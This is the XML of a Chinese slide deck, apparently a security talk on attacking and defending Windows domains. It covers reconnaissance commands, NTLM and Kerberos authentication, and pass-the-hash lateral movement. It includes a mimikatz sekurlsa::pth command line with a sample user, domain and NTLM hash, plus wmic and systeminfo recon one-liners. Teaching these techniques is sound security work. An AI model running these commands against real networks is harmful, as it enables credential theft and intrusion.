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301" r:id="rId2"/>
    <p:sldId id="316" r:id="rId3"/>
    <p:sldId id="309" r:id="rId4"/>
    <p:sldId id="317" r:id="rId5"/>
    <p:sldId id="318" r:id="rId6"/>
    <p:sldId id="319" r:id="rId7"/>
    <p:sldId id="320" r:id="rId8"/>
    <p:sldId id="323" r:id="rId9"/>
    <p:sldId id="369" r:id="rId10"/>
    <p:sldId id="370" r:id="rId11"/>
    <p:sldId id="371" r:id="rId12"/>
    <p:sldId id="315" r:id="rId13"/>
    <p:sldId id="256" r:id="rId14"/>
    <p:sldId id="326" r:id="rId15"/>
    <p:sldId id="327" r:id="rId16"/>
    <p:sldId id="328" r:id="rId17"/>
    <p:sldId id="329" r:id="rId18"/>
    <p:sldId id="330" r:id="rId19"/>
    <p:sldId id="331" r:id="rId20"/>
    <p:sldId id="322" r:id="rId21"/>
    <p:sldId id="324" r:id="rId22"/>
    <p:sldId id="295" r:id="rId23"/>
    <p:sldId id="332" r:id="rId24"/>
    <p:sldId id="333" r:id="rId25"/>
    <p:sldId id="334" r:id="rId26"/>
    <p:sldId id="335" r:id="rId27"/>
    <p:sldId id="336" r:id="rId28"/>
    <p:sldId id="338" r:id="rId29"/>
    <p:sldId id="337" r:id="rId30"/>
    <p:sldId id="287" r:id="rId31"/>
    <p:sldId id="344" r:id="rId32"/>
    <p:sldId id="345" r:id="rId33"/>
    <p:sldId id="346" r:id="rId34"/>
    <p:sldId id="347" r:id="rId35"/>
    <p:sldId id="340" r:id="rId36"/>
    <p:sldId id="341" r:id="rId37"/>
    <p:sldId id="342" r:id="rId38"/>
    <p:sldId id="339" r:id="rId39"/>
    <p:sldId id="343" r:id="rId40"/>
    <p:sldId id="348" r:id="rId41"/>
    <p:sldId id="349" r:id="rId42"/>
    <p:sldId id="350" r:id="rId43"/>
    <p:sldId id="325" r:id="rId44"/>
    <p:sldId id="351" r:id="rId45"/>
    <p:sldId id="352" r:id="rId46"/>
    <p:sldId id="357" r:id="rId47"/>
    <p:sldId id="356" r:id="rId48"/>
    <p:sldId id="358" r:id="rId49"/>
    <p:sldId id="359" r:id="rId50"/>
    <p:sldId id="360" r:id="rId51"/>
    <p:sldId id="361" r:id="rId52"/>
    <p:sldId id="363" r:id="rId53"/>
    <p:sldId id="366" r:id="rId54"/>
    <p:sldId id="362" r:id="rId55"/>
    <p:sldId id="365" r:id="rId56"/>
    <p:sldId id="364" r:id="rId57"/>
    <p:sldId id="368" r:id="rId58"/>
    <p:sldId id="271" r:id="rId5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程 康" initials="程" lastIdx="1" clrIdx="0">
    <p:extLst>
      <p:ext uri="{19B8F6BF-5375-455C-9EA6-DF929625EA0E}">
        <p15:presenceInfo xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" userId="fb846e5345700a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C"/>
    <a:srgbClr val="1DA97A"/>
    <a:srgbClr val="FEA400"/>
    <a:srgbClr val="CE293D"/>
    <a:srgbClr val="F57918"/>
    <a:srgbClr val="02539E"/>
    <a:srgbClr val="002D67"/>
    <a:srgbClr val="74CCE5"/>
    <a:srgbClr val="368B90"/>
    <a:srgbClr val="CA2F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3" autoAdjust="0"/>
    <p:restoredTop sz="91379" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="80" d="100"/>
          <a:sy n="80" d="100"/>
        </p:scale>
        <p:origin x="88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8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B5EDD-FF9E-4057-A488-E848CDD604EF}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>2019-12-07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E4CA6-4D40-4370-8D93-DA5309A021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145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E4CA6-4D40-4370-8D93-DA5309A0219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930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63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647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3781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119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8640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1935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070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3097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E4CA6-4D40-4370-8D93-DA5309A0219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214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9855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080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4264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343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980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6755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1E4CA6-4D40-4370-8D93-DA5309A0219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4234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374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115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453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611142" y="2090970"/>
            <a:ext cx="100112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>
                <a:solidFill>
                  <a:schemeClr val="bg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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="88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域渗透的攻守道</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="8800" b="1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3" name="五边形 42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="10469880" y="-118382"/>
            <a:ext cx="1066802" cy="1303567"/>
          </a:xfrm>
          <a:prstGeom prst="homePlate">
            <a:avLst>
              <a:gd name="adj" fmla="val 196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0251925" y="349714"/>
            <a:ext cx="1532207" cy="367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Attacking</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="文本框 43"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3071490" y="3599203"/>
            <a:ext cx="6062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ea typeface="Gulim" panose="020B0600000101010101" pitchFamily="34" charset="-127"/>
              </a:rPr>
              <a:t>By Ethan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ea typeface="Gulim" panose="020B0600000101010101" pitchFamily="34" charset="-127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609707" y="4109254"/>
            <a:ext cx="3214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ea typeface="Gulim" panose="020B0600000101010101" pitchFamily="34" charset="-127"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:ea typeface="Gulim" panose="020B0600000101010101" pitchFamily="34" charset="-127"/>
              </a:rPr>
              <a:t>Knownsec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ea typeface="Gulim" panose="020B0600000101010101" pitchFamily="34" charset="-127"/>
              </a:rPr>
              <a:t> 404 team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ea typeface="Gulim" panose="020B0600000101010101" pitchFamily="34" charset="-127"/>
            </a:endParaRP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818" y="4667272"/>
            <a:ext cx="950921" cy="95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1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77245" y="598261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74664"/>
            <a:ext cx="5454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lang="en-US" altLang="zh-CN" sz="4000" dirty="0" smtClean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–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" dirty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wmic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" dirty="0" smtClean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11595" y="3244334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![](</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>域渗透</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>\36.png)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9758" y="71367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9349" y="1725712"/>
            <a:ext cx="341632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搜集安装软件以及版本，路径等</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="777245" y="2695714"/>
            <a:ext cx="341631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wmic product &gt; insformation.txt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257" y="1192965"/>
            <a:ext cx="7782743" cy="534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77245" y="598261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4" y="285750"/>
            <a:ext cx="54939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lang="en-US" altLang="zh-CN" sz="4000" dirty="0" smtClean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–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" dirty="0" err="1" smtClean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systeminfo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" dirty="0" smtClean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11595" y="3244334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![](</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>域渗透</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>\36.png)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9758" y="71367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9349" y="1725712"/>
            <a:ext cx="2031325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搜集补丁安装情况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7244" y="2503954"/>
            <a:ext cx="8919205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systeminfo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;Ethan.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;(for %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 in (KB) do @type Ethan.txt|@find /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  "%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"|| @echo  no this padding: %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)&amp;del /f /q /a Ethan.txt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49" y="3362101"/>
            <a:ext cx="9533446" cy="33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1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41922" y="1838226"/>
            <a:ext cx="823902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目标资产信息搜集的程度，决定渗透过程的复杂程度。 目标主机信息搜集的深度，决定后渗透权限持续把控。 渗透的本质是信息搜集，而信息搜集整理为后续的情报跟进提供了强大的保证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785" y="4446702"/>
            <a:ext cx="23907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7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01798" y="2744530"/>
            <a:ext cx="5986342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怎么证明你就是你就是我眼中的你？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37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186301" y="1125303"/>
            <a:ext cx="3057247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传统账号密码认证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837" y="2799759"/>
            <a:ext cx="1501111" cy="1876389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3874268" y="3120270"/>
            <a:ext cx="3681315" cy="8334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Username/password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904" y="2704811"/>
            <a:ext cx="1886972" cy="2041944"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="左箭头 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3780825" y="3817856"/>
            <a:ext cx="3704057" cy="871607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结果一样成功，不一样失败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68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231727" y="1306124"/>
            <a:ext cx="1668545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挑战认证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074" y="2741266"/>
            <a:ext cx="1501111" cy="1876389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4703826" y="2698587"/>
            <a:ext cx="3701916" cy="7912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Hi~ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>我要登陆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673" y="2716784"/>
            <a:ext cx="1883827" cy="2042337"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="左箭头 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3552410" y="2984204"/>
            <a:ext cx="4328398" cy="1150660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+mn-ea"/>
              </a:rPr>
              <a:t>告诉</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>我你是谁，用你的密码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>加密段</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>随机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>数据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>dwqdasfaasd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>23767&amp;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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46185" y="4813581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4248910" y="3676454"/>
            <a:ext cx="4016123" cy="6905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我是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>user007</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，这是我加密的结果</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="左箭头 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3780825" y="4044450"/>
            <a:ext cx="4146813" cy="645013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结果一样成功，不一样失败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208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451319" y="1328346"/>
            <a:ext cx="2922308" cy="5326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挑战认证 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>- NTLM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825" y="2701481"/>
            <a:ext cx="7029297" cy="354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99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827283" y="1597843"/>
            <a:ext cx="3582185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       Kerberos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>认证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13745" y="3838575"/>
            <a:ext cx="2209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后面再说</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>…….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41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055042" y="1734533"/>
            <a:ext cx="4883085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</a:rPr>
              <a:t>账号密码认证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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>通过向服务器发送账号密码来证明自己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55042" y="2771724"/>
            <a:ext cx="4883085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挑战</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>认证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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>通过向服务器发送一段计算结果来证明自己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55042" y="3979684"/>
            <a:ext cx="4883085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</a:rPr>
              <a:t>Kerberos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>认证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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>通过向服务器发送一张</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>票</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>来证明自己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3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 smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg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横向移动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pass the hash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" name="泪滴形 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="7970546">
            <a:off x="188216" y="4993017"/>
            <a:ext cx="514588" cy="480628"/>
          </a:xfrm>
          <a:prstGeom prst="teardrop">
            <a:avLst>
              <a:gd name="adj" fmla="val 10526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211867" y="4769963"/>
            <a:ext cx="7083721" cy="926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Lato"/>
              </a:rPr>
              <a:t>我们</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato"/>
              </a:rPr>
              <a:t>已知目标计算机的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato"/>
              </a:rPr>
              <a:t>IP,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato"/>
              </a:rPr>
              <a:t>用户名，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato"/>
              </a:rPr>
              <a:t>hash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato"/>
              </a:rPr>
              <a:t>尝试登陆目标</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato"/>
              </a:rPr>
              <a:t>主机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato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Lato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Lato"/>
              </a:rPr>
              <a:t>个大型的内网环境底下获得一个用户的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato"/>
              </a:rPr>
              <a:t>hash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato"/>
              </a:rPr>
              <a:t>，尝试去撞整个内网的相同密码的主机，从而进行横向移动</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Lato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11867" y="1892241"/>
            <a:ext cx="7083722" cy="17543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585858"/>
                </a:solidFill>
                <a:latin typeface="Lato"/>
              </a:rPr>
              <a:t>在第三步计算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response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的时候，客户端是使用用户</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="585858"/>
                </a:solidFill>
                <a:latin typeface="Lato"/>
              </a:rPr>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="585858"/>
                </a:solidFill>
                <a:latin typeface="Lato"/>
              </a:rPr>
              <a:t>NTLM-hash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进行计算的，而不是用户密码进行计算的。因此在模拟用户登录的时候。是不需要用户明文密码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="585858"/>
                </a:solidFill>
                <a:latin typeface="Lato"/>
              </a:rPr>
              <a:t>的。微软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在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2014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年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5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月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13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日发布了针对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Pass The Hash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的更新补丁</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="585858"/>
                </a:solidFill>
                <a:latin typeface="Lato"/>
              </a:rPr>
              <a:t>kb2871997</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="585858"/>
                </a:solidFill>
                <a:latin typeface="Lato"/>
              </a:rPr>
              <a:t>，但是默认的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="585858"/>
                </a:solidFill>
                <a:latin typeface="Lato"/>
              </a:rPr>
              <a:t>Administrator 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(SID 500)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="585858"/>
                </a:solidFill>
                <a:latin typeface="Lato"/>
              </a:rPr>
              <a:t>账号仍然可以利用，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利用这个账号仍可以进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="585858"/>
                </a:solidFill>
                <a:latin typeface="Lato"/>
              </a:rPr>
              <a:t>Pass The Hash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="585858"/>
                </a:solidFill>
                <a:latin typeface="Lato"/>
              </a:rPr>
              <a:t>远程连接。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="泪滴形 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="7970546">
            <a:off x="188217" y="2116062"/>
            <a:ext cx="514588" cy="480628"/>
          </a:xfrm>
          <a:prstGeom prst="teardrop">
            <a:avLst>
              <a:gd name="adj" fmla="val 105262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0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19673" y="1941922"/>
            <a:ext cx="77243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defRPr/>
            </a:pP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lvl="0" algn="just"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Domain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white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将网络中多台计算机逻辑上组织到一起，进行集中管理，这种区别于工作组的逻辑环境叫做域，域是组织与存储资源的核心管理单元，在域中，至少有一台域控制器，域控制器中保存着整个域的用户帐号和安全数据库</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="white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zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:prstClr val="white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89714"/>
            <a:ext cx="49398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认识域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811" y="4000367"/>
            <a:ext cx="261937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6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 smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg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横向移动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pass the hash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59497" y="1524151"/>
            <a:ext cx="1772239" cy="52322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mimikatz</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="28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59497" y="2544638"/>
            <a:ext cx="8389094" cy="92333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just"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>privilege::debug</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>sekurlsa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::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pth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  /user:de1ay  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/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domain:de1ay.com           /ntlm:161cff084477fe596a5db81874498a24   </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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8675" y="733670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73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横向移动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pass the hash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" name="泪滴形 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="7970546">
            <a:off x="373661" y="2973860"/>
            <a:ext cx="514588" cy="480628"/>
          </a:xfrm>
          <a:prstGeom prst="teardrop">
            <a:avLst>
              <a:gd name="adj" fmla="val 10526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15" y="1466587"/>
            <a:ext cx="7562850" cy="37052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306" y="1525602"/>
            <a:ext cx="5297883" cy="461507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2209" y="767714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519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横向移动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pass the hash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55" y="2693479"/>
            <a:ext cx="10248899" cy="323763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12777" y="1746277"/>
            <a:ext cx="2185214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cobalt strike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3730" y="760391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739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2" name="矩形 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="503081" y="1555422"/>
            <a:ext cx="518474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Kerberos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协议中主要是有三个角色的存在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58" y="2929043"/>
            <a:ext cx="5070442" cy="381028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53592" y="263087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KDC (key distribution center) key</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>分配中心，受信任的第三</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>方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默认安装在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DC)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</a:rPr>
              <a:t> AS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(the Authentication Server) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>认证服务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TGS (Ticket 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Granting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Service) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>票据授予服务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TGT (ticket-granting ticket) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>票据</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="145725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88781" y="290087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4" name="矩形 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1301082" y="1508289"/>
            <a:ext cx="2186835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Kerberos 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子协议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01082" y="2603571"/>
            <a:ext cx="259256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</a:rPr>
              <a:t>AS-REQ &amp;AS-REP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</a:rPr>
              <a:t>获取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>TGT(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>身份证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01082" y="3689224"/>
            <a:ext cx="443922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</a:rPr>
              <a:t>TGS-REQ &amp;TGS-REP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用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>TGT(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>身份证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  <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>去换目标服务的票据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1082" y="4832966"/>
            <a:ext cx="432874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</a:rPr>
              <a:t>AP-REQ &amp;AP-REP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</a:rPr>
              <a:t>将票据发给目标服务，进行访问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39" y="1546684"/>
            <a:ext cx="5311600" cy="340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4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4" name="矩形 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4015819" y="1020507"/>
            <a:ext cx="3968684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 AS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协议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-TGT(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身份证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获取协议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877" y="2581717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3731" y="2581717"/>
            <a:ext cx="1883827" cy="2042337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6551035" y="2508149"/>
            <a:ext cx="3346515" cy="678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AS-REQ</a:t>
            </a:r>
